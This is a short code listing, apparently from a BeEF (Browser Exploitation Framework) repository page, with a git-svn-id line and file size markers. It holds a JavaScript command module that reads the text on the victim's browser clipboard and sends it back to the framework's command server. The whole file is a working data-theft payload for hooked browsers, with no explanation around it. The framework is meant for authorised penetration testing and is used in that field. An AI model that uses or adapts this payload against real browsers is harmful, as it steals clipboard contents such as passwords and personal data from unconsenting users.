git-svn-id: https://beef.googlecode.com/svn/trunk@1000 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
8 lines
320 B
JavaScript
8 lines
320 B
JavaScript
beef.execute(function() {
|
|
if (clipboardData.getData("Text") !== null) {
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboardData.getData("Text"));
|
|
} else {
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard=clipboardData.getData is null or not supported.");
|
|
}
|
|
});
|